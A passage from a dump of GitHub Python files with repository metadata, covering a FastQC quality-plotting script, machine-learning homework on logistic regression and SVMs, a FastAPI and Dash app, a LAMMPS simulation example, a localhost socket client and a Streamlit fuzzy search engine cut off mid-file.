sample_name = file.split('/')[-1].replace('_fastqc.zip','')\n archive = zipfile.ZipFile(file,'r')\n target_file = [i for i in archive.namelist() if i.endswith('fastqc_data.txt')][0]\n fastqc_log = archive.read(target_file)\n fastqc_log_formatted = str(fastqc_log).replace('\\\\t','\\t').split('\\\\n')\n labels,results = get_test_results(fastqc_log_formatted)\n num_results = [0 if i == 'pass' else i for i in results]\n num_results = [1 if i == 'warn' else i for i in num_results]\n num_results = [2 if i == 'fail' else i for i in num_results]\n sample_test_results_dict[sample_name] = num_results\n\n label_abbrevations = []\n for i in labels:\n split_string = i.split(' ')\n abbrevation = []\n for j in split_string:\n letter = j[0]\n abbrevation.append(letter)\n abbrevation = ''.join(abbrevation)\n label_abbrevations.append(abbrevation)\n # plot the sample overview\n ordered_dict = collections.OrderedDict(sorted(sample_test_results_dict.items()))\n samples = list(ordered_dict.keys())\n values = np.array(list(ordered_dict.values()))\n\n fig = plt.figure(figsize=(8,len(samples)))\n plt.imshow(values, interpolation='nearest', cmap=colors.ListedColormap(['green','yellow','red']))\n plt.yticks(list(range(values.shape[0])), samples)\n plt.xticks(list(range(values.shape[1])), label_abbrevations)\n plt.xlabel('FastQC test (abbrevated names)')\n plt.ylabel('Sample name')\n plt.title('FastQC results by sample')\n fig.savefig(os.path.join(fastqc_out_folder,'quality_summary_all_samples_1.pdf'), dpi = 500,transparent=True,bbox_inches='tight')\n\n # plot the test overview\n all_pass_counts = [list(col).count(0) for col in values.T]\n all_warn_counts = [list(col).count(1) for col in values.T]\n all_fail_counts = [list(col).count(2) for col in values.T]\n\n barWidth=0.3\n r2 = np.arange(len(all_pass_counts))\n r1 = [x - barWidth for x in r2]\n r3 = [x + barWidth for x in r2]\n\n fig = plt.figure(figsize=(8,1+len(samples)/8))\n plt.bar(r1, all_pass_counts, color='green', width=barWidth, edgecolor='black', label='pass')\n plt.bar(r2, all_warn_counts, color='yellow', width=barWidth, edgecolor='black', label='warn')\n plt.bar(r3, all_fail_counts, color='red', width=barWidth, edgecolor='black', label='fail')\n plt.xticks(list(range(values.shape[1])), label_abbrevations)\n for border in np.array(r3)+0.66*barWidth:\n plt.axvline(border,color='black',linestyle='--',alpha=0.5)\n #plt.yticks(range(len(samples)+1), range(len(samples)+1))\n plt.xlim(0-barWidth-0.75*barWidth,)\n plt.xlabel('FastQC test (abbrevated names)')\n plt.ylabel('number of samples')\n plt.title('FastQC results by test type')\n #plt.legend()\n fig.savefig(os.path.join(fastqc_out_folder,'quality_summary_all_samples_2.pdf'), dpi = 500,transparent=True,bbox_inches='tight')\n\ndef main(args):\n # Set working directory\n out_folder = args.output\n cores = args.cores\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n # Get list of all fastq-files\n input_folder = args.input\n matches = []\n for root, dirnames, filenames in os.walk(input_folder):\n for filename in [i for i in filenames if '.fastq' in i]:\n if not '-single.fastq' in filename:\n matches.append(os.path.join(root, filename))\n if len(matches) == 0:\n print('No files with the ending .fastq found in input folder. Please check path and ensure that all readfiles are unzipped and have the filending \".fastq\"')\n sys.exit()\n fastq_df = pd.DataFrame(index=np.arange(0,len(matches)), columns=['filepaths'])\n fastq_df['filepaths'] = matches\n fastq_list_path = os.path.join(out_folder,'fastq_file_list.txt')\n fastq_df.to_csv(fastq_list_path,index=False,header=False,sep='\\t')\n\n # run FASTQC\n fastqc_cmd = [\n 'fastqc -t %i -o %s -f fastq $(cat %s)' %(cores,out_folder,fastq_list_path)\n ]\n with open(os.path.join(out_folder, \"fastqc_screen_out.txt\"), 'w') as log_err_file:\n p = subprocess.Popen(fastqc_cmd, stdout=log_err_file, stderr=log_err_file, shell=True)\n p.communicate()\n\n plot_fastqc_results(out_folder)\n","repo_name":"AntonelliLab/seqcap_processor","sub_path":"secapr/quality_check.py","file_name":"quality_check.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"41747774531","text":"from itertools import combinations\n\ndef solution(dots):\n lines = list(combinations(dots, 2))\n for i in range(3):\n p1 = lines[i][0]\n p2 = lines[i][1]\n p3 = lines[-(i+1)][0]\n p4 = lines[-(i+1)][1]\n if p2[0]-p1[0] == 0 and p4[0]-p3[0] == 0:\n return 1\n elif p2[0]-p1[0] == 0 or p4[0]-p3[0] == 0:\n continue\n else:\n gradi1 = (p2[1]-p1[1])/(p2[0]-p1[0])\n gradi2 = (p4[1]-p3[1])/(p4[0]-p3[0])\n if gradi1 == gradi2:\n return 1\n return 0","repo_name":"rhc716/algorithm","sub_path":"프로그래머스/lv0/120875. 평행/평행.py","file_name":"평행.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25118326211","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport scipy.io as sio\nimport time\nfrom sklearn.svm import SVC\n\n#data matrices\nq1_dataset = sio.loadmat('q1_dataset.mat')\nhog_features_train = q1_dataset['hog_features_train']\nhog_features_test = q1_dataset['hog_features_test']\ninception_features_train = q1_dataset['inception_features_train']\ninception_features_test = q1_dataset['inception_features_test']\nsuperclass_labels_train = q1_dataset['superclass_labels_train']\nsuperclass_labels_test = q1_dataset['superclass_labels_test']\nsubclass_labels_train = q1_dataset['subclass_labels_train']\nsubclass_labels_test = q1_dataset['subclass_labels_test']\n\n#upon inspection hog features are standardized but inception is not. Thus Standardizing inception\ninception_features_train = (inception_features_train - np.mean(inception_features_train, axis=0)) / np.std(inception_features_train, axis=0)\ninception_features_test = (inception_features_test - np.mean(inception_features_test, axis=0)) / np.std(inception_features_test, axis=0)\n\ndef sigmoid(x):\n return 1.0 / (1.0 + np.exp(-x))\n\ndef hyp(w, X):\n return sigmoid(np.dot(X, w))\n\ndef gradAscent(w, X, Y, batchSize=1, iters=1000, alpha=0.001, gType='mini'):\n dataSet = np.c_[X,Y]\n for i in range(iters):\n if (gType == 'batch' and (i+1) % 100 == 0):\n print(\"Weights at i = \", i+1, \" :\", w)\n startLoc = 0\n if (batchSize < X.shape[0]):\n dataSet = dataSet[np.random.permutation(dataSet.shape[0]),:]\n for j in range(int(X.shape[0] / batchSize)):\n x = dataSet[startLoc:startLoc + batchSize, :-1]\n y = dataSet[startLoc:startLoc + batchSize, -1]\n startLoc = (startLoc + batchSize) % X.shape[0]\n w = w + alpha * np.dot(x.T, y - hyp(w, x)) \n return w\n\ndef initialW(mean, sigma, size):\n return np.random.normal(mean, sigma, size)\n\ndef trainLogistic(X,y, batchSize=1, alpha=0.0001, gType='mini'):\n biasedX = np.c_[np.ones((X.shape[0], 1)), X]\n w = initialW(0, 0.01, biasedX.shape[1])\n w = gradAscent(w, biasedX, y, batchSize, alpha=alpha, gType=gType)\n return w\n\ndef testLogistic(w, X, y):\n biasedX = np.c_[np.ones((X.shape[0], 1)), X]\n predictions = ((hyp(w, biasedX) >= 0.5).astype(int)).flatten()\n print(\"Accuracy: \", np.mean(predictions == y) * 100)\n TP = sum(predictions[np.where(predictions == y)] == 1)\n TN = sum(predictions[np.where(predictions == y)] == 0)\n FP = sum(predictions[np.where(predictions != y)] == 1)\n FN = sum(predictions[np.where(predictions != y)] == 0)\n precision = TP / (TP + FP)\n recall = TP / (TP + FN)\n NPV = TN / (FN + TN)\n FPR = FP / (TP + FP)\n FDR = FP / (FN + TN)\n F1 = 2 * precision * recall / (precision + recall)\n F2 = 5 * precision * recall / ((4 * precision) + recall)\n print(\"Precision: \", precision)\n print(\"Recall: \", recall)\n print(\"NPV: \", NPV)\n print(\"FPR: \", FPR)\n print(\"FDR: \", FDR)\n print(\"F1: \", F1)\n print(\"F2: \", F2)\n print(\"----Confusion Matrix----\")\n print(\"TP: \", TP, \"FP: \", FP)\n print(\"FN: \", FN, \"TN: \", TN)\n# Q1.1 \n# mini batch with NN features\nprint(\"---------Mini Batch NN Features---------\")\nstart = time.time()\nw = trainLogistic(inception_features_train, superclass_labels_train.flatten(), 25, 0.0001)\ntestLogistic(w, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# stochastic with NN features\nprint(\"---------Stochastic NN Features---------\")\nstart = time.time()\nw = trainLogistic(inception_features_train, superclass_labels_train.flatten(), 1, 0.0001)\ntestLogistic(w, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# mini batch with HOG features\nprint(\"---------Mini Batch HOG Features---------\")\nstart = time.time()\nw = trainLogistic(hog_features_train, superclass_labels_train.flatten(), 25, 0.0001)\ntestLogistic(w, hog_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# stochastic with HOG features\nprint(\"---------Stochastic HOG Features---------\")\nstart = time.time()\nw = trainLogistic(hog_features_train, superclass_labels_train.flatten(), 1, 0.0001)\ntestLogistic(w, hog_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# Q 1.2\n# batch with NN features\nprint(\"---------Batch NN Features---------\")\nstart = time.time()\nw = trainLogistic(inception_features_train, superclass_labels_train.flatten(), inception_features_train.shape[0], 0.001, gType='batch')\nind = np.argpartition(w, -10)[-10:]\nprint(\"Indices of 10 most important features: \", ind)\ntestLogistic(w, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# batch with HOG features\nprint(\"---------Batch HOG Features---------\")\nstart = time.time()\nw = trainLogistic(hog_features_train, superclass_labels_train.flatten(), hog_features_train.shape[0], 0.0001, gType='batch')\nind = np.argpartition(w, -10)[-10:]\nprint(\"Indices of 10 most important features: \", ind)\ntestLogistic(w, hog_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n\n#Q 1.3 Stratified K fold\ndef stratified_k_fold(X, Y, k):\n dataSet = np.c_[X,Y]\n labels = np.unique(Y)\n data_labels = []\n for label in labels:\n data_label_set = dataSet[np.asarray(np.where(dataSet[:, -1] == label))].squeeze()\n data_labels.append(np.random.permutation(data_label_set))\n \n data_K = []\n for i in range(k):\n data = np.ones((1,dataSet.shape[1]))\n for data_label in data_labels:\n fold_cut = int(math.ceil(data_label.shape[0] / k))\n data = np.vstack([data, data_label[i * fold_cut:((i+1) * fold_cut), :]])\n data_K.append(np.random.permutation(data[1:, :]))\n \n return data_K\n\n\n#SVM model helper methods\ndef getLeftOut(data_K, i):\n data_K = np.asarray(data_K)\n train = [x for x in range(len(data_K)) if x != i]\n return data_K[np.asarray(train)], data_K[i]\n \ndef SVM_train_k_fold(data_K, C=1.0, kernel='linear', degree=3, gamma=2):\n accuracy = []\n for i in range (len(data_K)):\n train, test = getLeftOut(data_K, i)\n train = train.reshape((-1, test.shape[1]))\n svclassifier = SVC(C=C, kernel=kernel, degree=degree, gamma=gamma)\n svclassifier.fit(train[:, :-1], train[:, -1])\n final_prediction = svclassifier.predict(test[:, :-1])\n accuracy.append(np.mean(final_prediction == test[:,-1]) * 100)\n return np.mean(accuracy)\n \ndef SVM_train(X, Y, C=None, kernel='linear', degree=None, gamma=None, k_folds=5):\n data_K = stratified_k_fold(X, Y, k_folds)\n accuracies = []\n if kernel is 'linear':\n for c in C:\n accuracies.append(SVM_train_k_fold(data_K, C=c, kernel='linear'))\n print(\"C: \", c, \" Accuracy: \", accuracies[-1])\n C_final = C[np.argmax(accuracies)]\n print(\"fin_C: \", C_final)\n svclassifier = SVC(C=C_final, kernel='linear')\n elif kernel is 'rbf':\n for c in C:\n for g in gamma:\n accuracies.append(SVM_train_k_fold(data_K, C=c, kernel='rbf', gamma=g))\n print(\"C: \", c, \" G: \", g, \" Accuracy: \", accuracies[-1])\n loc = np.argmax(accuracies)\n C_final = C[(int)(loc / len(gamma))]\n if len(C) is 1:\n gamma_final = gamma[loc]\n else:\n gamma_final = gamma[loc % len(C)]\n print(\"fin_C: \", C_final, \" fin_gamma: \", gamma_final)\n svclassifier = SVC(C=C_final, kernel='rbf', gamma=gamma_final)\n elif kernel is 'poly':\n for d in degree:\n for g in gamma:\n accuracies.append(SVM_train_k_fold(data_K, C=C[0], kernel='poly', gamma=g, degree=d))\n print(\"C: \", C[0], \" G: \", g, \" D: \", d, \" Accuracy: \", accuracies[-1])\n loc = np.argmax(accuracies)\n degree_final = degree[(int)(loc / len(gamma))]\n gamma_final = gamma[loc % len(degree)]\n print(\"fin_degree: \", degree_final, \" fin_gamma: \", gamma_final, \" fin_C: \", C[0])\n svclassifier = SVC(C=C[0], kernel='poly', gamma=gamma_final, degree=degree_final)\n svclassifier.fit(X, Y)\n return svclassifier\n\ndef con_mat(final_prediction, y):\n u = np.unique(y)\n confusion_matrix = np.zeros((u.shape[0],u.shape[0]))\n for i in range(u.shape[0]**2):\n predicted = (int)(i / u.shape[0])\n actual = i % u.shape[0]\n pred_loc = np.array(np.where(final_prediction == (u.shape[0] - 1 - predicted))).flatten()\n act_loc = np.array(np.where(y == (u.shape[0] - 1 - actual))).flatten()\n val = (np.array(np.intersect1d(pred_loc, act_loc)).flatten()).shape[0]\n confusion_matrix[predicted][actual] = val\n return confusion_matrix\n\ndef SVM_test(classifier, X, y):\n final_prediction = classifier.predict(X)\n u = np.unique(y)\n confusion_matrix = con_mat(final_prediction, y)\n \n \n print(\"----Confusion Matrix----\")\n if u.shape[0] == 2:\n print(confusion_matrix)\n print(\"Accuracy: \", np.mean(final_prediction == y) * 100)\n precision = confusion_matrix[0][0] / (confusion_matrix[0][0] + confusion_matrix[0][1])\n recall = confusion_matrix[0][0] / (confusion_matrix[0][0] + confusion_matrix[1][0])\n print(\"Precision: \", precision)\n print(\"Recall: \", recall)\n else:\n print(np.flipud(np.fliplr(confusion_matrix)))\n print('Accuracy, avg: ', np.sum(confusion_matrix.diagonal() * 100/confusion_matrix.sum(axis=0))/u.shape[0])\n y_class = np.zeros((u.shape[0], y.shape[0]))\n pred_class = np.zeros((u.shape[0], y.shape[0]))\n TP = []\n FP = []\n FN = []\n precisions = []\n recalls = []\n F1s = []\n print('Accuracy, class:', confusion_matrix.diagonal() * 100/confusion_matrix.sum(axis=0))\n for i in range(u.shape[0]):\n y_class[i][np.array(np.where(y == u[i]))] = 1\n pred_class[i][np.array(np.where(final_prediction == u[i]))] = 1\n TP.append(sum(pred_class[i][np.where(pred_class[i] == y_class[i])] == 1))\n FP.append(sum(pred_class[i][np.where(pred_class[i] != y_class[i])] == 1))\n FN.append(sum(pred_class[i][np.where(pred_class[i] != y_class[i])] == 0))\n precisions.append(TP[-1] / (TP[-1] + FP[-1]))\n recalls.append(TP[-1] / (TP[-1] + FN[-1]))\n F1s.append(2 * precisions[-1] * recalls[-1] / (precisions[-1] + recalls[-1]))\n precision_macro = np.sum(np.array(precisions)) / len(precisions)\n recall_macro = np.sum(np.array(recalls)) / len(recalls)\n F1_macro = np.sum(np.array(F1s)) / len(F1s)\n precision_micro = np.sum(np.array(TP)) / (np.sum(np.array(TP)) + np.sum(np.array(FP)))\n recall_micro = np.sum(np.array(TP)) / (np.sum(np.array(TP)) + np.sum(np.array(FN)))\n F1_micro = 2 * precision_micro * recall_micro / (precision_micro + recall_micro)\n print(\"Precision_micro: \", precision_micro)\n print(\"Precision_macro: \", precision_macro)\n print(\"Recall_micro: \", recall_micro)\n print(\"Recall_macro: \", recall_macro)\n print(\"F1_micro: \", F1_micro)\n print(\"F1_macro: \", F1_macro)\n \n#Superclass Classification\n# Q 1.4 Soft Margin SVM Linear kernel\nprint(\"---------Soft Margin SVM Linear Kernel Hog---------\")\nstart = time.time()\nclassifier = SVM_train(hog_features_train, superclass_labels_train.flatten(), C=[0.01, 0.1, 1, 10, 100])\nSVM_test(classifier, hog_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\nprint(\"---------Soft Margin SVM Linear Kernel NN---------\")\nstart = time.time()\nclassifier = SVM_train(inception_features_train, superclass_labels_train.flatten(), C=[0.01, 0.1, 1, 10, 100])\nSVM_test(classifier, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# Q 1.5 Hard Margin SVM RBF kernel\nprint(\"---------Hard Margin SVM RBF Kernel Hog---------\")\nstart = time.time()\nclassifier = SVM_train(hog_features_train, superclass_labels_train.flatten(), C=[1e10], kernel='rbf', gamma=[2**(-4), 2**(-3), 2**(-2), 2**(-1), 2**(0), 2**(1), 2**(6)])\nSVM_test(classifier, hog_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\nprint(\"---------Hard Margin SVM RBF Kernel NN---------\")\nstart = time.time()\nclassifier = SVM_train(inception_features_train, superclass_labels_train.flatten(), C=[1e10], kernel='rbf', gamma=[2**(-4), 2**(-3), 2**(-2), 2**(-1), 2**(0), 2**(1), 2**(6)])\nSVM_test(classifier, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# Q 1.6 Soft Margin SVM RBF kernel\nprint(\"---------Soft Margin SVM RBF Kernel Hog---------\")\nstart = time.time()\nclassifier = SVM_train(hog_features_train, superclass_labels_train.flatten(), C=[10**(-2), 1, 10**(2)], kernel='rbf', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, hog_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\nprint(\"---------Soft Margin SVM RBF Kernel NN---------\")\nstart = time.time()\nclassifier = SVM_train(inception_features_train, superclass_labels_train.flatten(), C=[10**(-2), 1, 10**(2)], kernel='rbf', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n\n# Subclass Classification\n# Q 1.7 Soft Margin SVM RBF one vs all kernel\nprint(\"---------Soft Margin SVM RBF Kernel one vs all Hog---------\")\nstart = time.time()\nclassifier = SVM_train(hog_features_train, subclass_labels_train.flatten(), C=[10**(-2), 1, 10**(2)], kernel='rbf', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, hog_features_test, subclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\nprint(\"---------Soft Margin SVM RBF Kernel one vs all NN---------\")\nstart = time.time()\nclassifier = SVM_train(inception_features_train, subclass_labels_train.flatten(), C=[10**(-2), 1, 10**(2)], kernel='rbf', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, inception_features_test, subclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# Q 1.8 Hard Margin SVM Poly one vs all kernel\nprint(\"---------Hard Margin SVM poly Kernel one vs all Hog---------\")\nstart = time.time()\nclassifier = SVM_train(hog_features_train, subclass_labels_train.flatten(), C=[1e10], degree=[3, 5, 7], kernel='poly', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, hog_features_test, subclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\nprint(\"---------Hard Margin SVM poly Kernel one vs all NN---------\")\nstart = time.time()\nclassifier = SVM_train(inception_features_train, subclass_labels_train.flatten(), C=[1e10], degree=[3, 5, 7], kernel='poly', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, inception_features_test, subclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n#Q2\ndef pltImg(X, label, fig, j):\n for i in range(j,j+5):\n img = (X[i%5,:]).reshape((85,125))\n img1 = fig.add_subplot(3, 5, i+1) \n img1.set_title(label+\" \"+str(i%5+1))\n plt.imshow(img)\n return i + 1\n\nq2_dataset = sio.loadmat('q2_dataset.mat')\nX = q2_dataset['data']\nX = X.reshape((150, 10625))\nfig = plt.figure(figsize=(85, 125))\nj = pltImg(X,\"Original\", fig, 0)\n\n#2.1 SVD based\nstart = time.time()\nU, S, VT = np.linalg.svd(X)\nend = time.time()\n\nSigma = np.zeros((X.shape[0], X.shape[1]))\nSigma[:, :X.shape[0]] = np.diag(S)\nprint(\"---------SVD based---------\")\nprint(\"MSE: \", ((X - np.dot(U, np.dot(Sigma, VT)))**2).mean())\nprint(\"took \", end - start, \" seconds to finsh.\")\nj = pltImg(np.dot(U, np.dot(Sigma, VT)),\"SVD\", fig, j)\n\n#2.2 cov based\nstart = time.time()\nm = np.mean(X, axis=0)\nX_mean = X - m\nX_cov = np.cov(X_mean.transpose())\neig_val, eig_vec = np.linalg.eig(X_cov)\nend = time.time()\n\nreduced_X = np.dot(X_mean, eig_vec.transpose())\nreconstructed_X = (np.dot(reduced_X, eig_vec)).real + m\nprint(\"---------Covariance based---------\")\nprint(\"MSE: \", ((X - reconstructed_X)**2).mean())\nprint(\"took \", end - start, \" seconds to finsh.\")\nj = pltImg(reconstructed_X,\"COV\", fig, j)\n\nplt.show()\n","repo_name":"usman-kakakhel/ML-CS464-Bilkent","sub_path":"hw2/q1_2.py","file_name":"q1_2.py","file_ext":"py","file_size_in_byte":16656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11687185873","text":"from fastapi import FastAPI, APIRouter\nfrom fastapi.middleware.wsgi import WSGIMiddleware\nfrom fastapi.encoders import jsonable_encoder\nfrom fastapi.responses import JSONResponse\n\nfrom pydantic import BaseModel\n\nimport dash \nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\n\n\nclass Link(BaseModel):\n title: str\n url: str\n\n\n# Create the Dash application, make sure to adjust requests_pathname_prefix\napp_dash = dash.Dash(__name__, requests_pathname_prefix='/dash/')\napp_dash.layout = html.Div(children=[\n html.H1(children='Hello Dash'),\n\n html.Div(children='''\n Dash: A web application framework for Python.\n '''),\n\n dcc.Graph(\n id='example-graph',\n figure={\n 'data': [\n {'x': [1, 2, 3], 'y': [4, 1, 2], 'type': 'bar', 'name': 'SF'},\n {'x': [1, 2, 3], 'y': [2, 4, 5],\n 'type': 'bar', 'name': u'Montréal'},\n ],\n 'layout': {\n 'title': 'Dash Data Visualization'\n }\n }\n )\n])\n\napp = FastAPI()\n\n\n@app.get(\"/\")\ndef read_root():\n link_list: Links = [{'title': \"api-test-routes\",\n 'url': \"https://fastapi-prototyping.herokuapp.com/docs\"},\n {'title': 'supermarket-dashboard',\n 'url': 'https://fastapi-prototyping.herokuapp.com/dash'}]\n return JSONResponse(content=jsonable_encoder(link_list))\n\n\n@app.post('/dialogflow/fulfillment/payment')\ndef dialogflow_scb_payment(request):\n return {k: v for k, v in request}\n\n\n# Now mount you dash server into main fastapi application\napp.mount(\"/dash\", WSGIMiddleware(app_dash.server))\n","repo_name":"kakamband/fastapi-heroku","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"40205678165","text":"import os\nfrom pysimm import system, lmps\n\n\ndef run(test=False):\n logFileName = 'steps.log'\n \n # use an import from .yaml to get of previously created pmma-based 4-chain polymer structure\n polymer = system.read_yaml(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"polymer.yaml\"))\n polymer.forcefield = 'dreiding'\n \n # Initialize the wrapper object around the polymer that will organize the work with LAMMPS\n print('Creating Simulation object with log-file in \"{0:s}\"'.format(logFileName))\n sim = lmps.Simulation(polymer, log='steps.log')\n \n # setting up the parameters for the energy optimization\n # add_min() method will add the \"Minimization\" task to the task que of the \n # Simulation object that is stored in sim.sim list\n print('Creating and running energy-minimization task:')\n sim.add_min(min_style='cg', name='minimization', etol=1.0e-5, ftol=1.0e-5)\n \n print('Creating and running molecular dynamics task:')\n # Let's set up the Molecular dynamics task\n sim.add_md(ensemble='nvt', timestep=1.0)\n \n print('List of simulation tasks ready to run:')\n print(sim.sim)\n \n print('Input that will be passed to LAMMPS when the simulation is performed:')\n sim.write_input()\n print(sim.input)\n \n # call run to run the simulation\n sim.run()\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"polysimtools/pysimm","sub_path":"Examples/07_lammps_simulation/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"78"} +{"seq_id":"14432895704","text":"#!coding=utf-8\r\n\r\nimport socket\r\nimport os\r\nimport sys\r\nimport struct\r\nimport pandas as pd\r\nimport json\r\n\r\ndef socket_client():\r\n ## 开始链接,127.0.0.1,9001表示本机的端口这里不用修改\r\n try:\r\n s = socket.socket()\r\n s.connect(('127.0.0.1', 9001))\r\n except socket.error as msg:\r\n print(msg)\r\n sys.exit(1)\r\n ## 服务器第一次回信,会收到welcome代表连上\r\n print(s.recv(1024))\r\n ## 给边缘设备发送的内容:epoch数、learning_rate大小,以及从excel读取的data数据,存放在send_dic字典中(可添加新的内容:send_dic['xxx']=xxx)\r\n param = pd.read_excel('param.xlsx')\r\n epoch=20\r\n learning_rate = 0.01\r\n param['迭代次数'][0] = epoch\r\n param['学习率'][0] = learning_rate\r\n df = pd.read_excel('测试数据集/测试数据集/任务三data.xlsx')\r\n id = 1000000001\r\n\r\n data = []\r\n true_data = []\r\n for i in range(len(df['用户编号'])):\r\n if i != len(df['用户编号']) - 1:\r\n if df['用户编号'][i] == id:\r\n true_data.append(int(df['缴费金额(元)'][i]))\r\n else:\r\n id = df['用户编号'][i]\r\n data.append(true_data)\r\n true_data = []\r\n true_data.append(int(df['缴费金额(元)'][i]))\r\n else:\r\n true_data.append(int(df['缴费金额(元)'][i]))\r\n data.append(true_data)\r\n\r\n send_dic = {}\r\n send_dic['data']=data\r\n send_dic['learning_rate']=learning_rate\r\n send_dic['epoch']=epoch\r\n ## 将字典打包为字符串发过去\r\n json_string = json.dumps(send_dic)\r\n s.send(json_string.encode())\r\n\r\n\r\n ## 接受边缘设备的输出结果:画图所需的10个用户的损失(result['loss']),训练时间(result['spend_time']),以及预测值(result['pred'],这个就是你们之前写的存放在total数组中的数据)\r\n ## 8192表示一次可以接受到最大的byte数为8192,长度太长会被截断,可以调整\r\n result = json.loads(s.recv(8192))\r\n s.close()\r\n return result\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n result = socket_client()\r\n print(result)\r\n\r\n","repo_name":"luopanyaxin/software","sub_path":"clienttask3.py","file_name":"clienttask3.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37952953805","text":"import sys\n\nimport numpy as np\n# from sklearn import preprocessing\n# from sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nimport joblib\n\n\nOUTS = 1\n\n\ndef logistic_regression(outs=OUTS):\n\t# Данные\n\n\tdataset = np.loadtxt('test.csv', delimiter=',', skiprows=1)\n\n\tprint(outs)\n\n\tx = dataset[:, :-outs]\n\ty = dataset[:, -outs:]\n\n\tprint(x, y)\n\n\t# Преобразование y\n\n\ty = [1 if row else 2 for row in y]\n\n\t# Стандартизация\n\n\t# x = preprocessing.normalize(x)\n\n\t# Рассчёт весов\n\n\t# sc = StandardScaler()\n\t# sc.fit(x)\n\t# x_std = sc.transform(x)\n\t# x_test_std = sc.transform(x_test)\n\tx_std = x\n\t# x_test_std = x_test\n\n\tmodel = LogisticRegression(C=1000.0, random_state=0)\n\tmodel.fit(x_std, y)\n\n\t#\n\n\treturn model\n\ndef test(outs, model):\n\tdataset = np.loadtxt('test.csv', delimiter=',', skiprows=1)\n\tx = dataset[:, outs:]\n\ty = dataset[:, :outs]\n\n\ty = [np.where(row == 1.)[0][0] for row in y]\n\tresult = [model.predict([row])[0] == y[num] for num, row in enumerate(x)]\n\n\treturn sum(result), len(result)\n\n\nif __name__ == '__main__':\n\t# outs = np.genfromtxt('categories.csv', delimiter=',').shape[0]\n\touts = 1\n\n\tmodel = logistic_regression(outs)\n\n\t# Сохранение модели\n\n\tjoblib.dump(model, 'model.txt')\n\t# print(model)\n\n\t# Тестирование\n\n\tansw_right, answ_all = test(outs, model)\n\tprint('Test: {}%'.format(answ_right * 100 // answ_all))","repo_name":"TensyTeam/CET-MIPT-Hack","sub_path":"re/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70888363131","text":"# streamlit\r\n\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport json\r\nimport time\r\nimport pickle\r\nimport collections\r\nfrom rapidfuzz import fuzz\r\nfrom itertools import islice\r\n\r\n\r\nst.title(\"Search Engine\")\r\nst.write(\"\"\"For a given text query search the corpus of the provided documents and return the\r\nmost relevant document. Expose the module as API which takes a text input and returns\r\nthe most relevant document. API should also have a parameter to get top n relevant\r\ndocuments instead of just top 1. The dataset will contain 2 fields, text and a unique id,\r\nreturn both the fields along with the similarity score in the API response.\"\"\")\r\n\r\n@st.cache(allow_output_mutation=True)\r\ndef load_products():\r\n folder_path = \"C:\\\\Users\\\\apurnaik\\\\OneDrive - Deloitte (O365D)\\\\Commback\\\\Projects\\\\Apps\\\\SearchEngine\\\\\"\r\n return pickle.load(open(folder_path+'products.pkl',\"rb\"))\r\n\r\ndef take(numdocs, iterable):\r\n \"Return first n items of the iterable as a list\"\r\n return list(islice(iterable, numdocs))\r\n\r\ndef find_relevant_docs(searchtext, numdocs):\r\n d = {fuzz.QRatio(searchtext, item['text']):item for item in products}\r\n od = collections.OrderedDict(sorted(d.items(), reverse=True))\r\n res = take(numdocs, 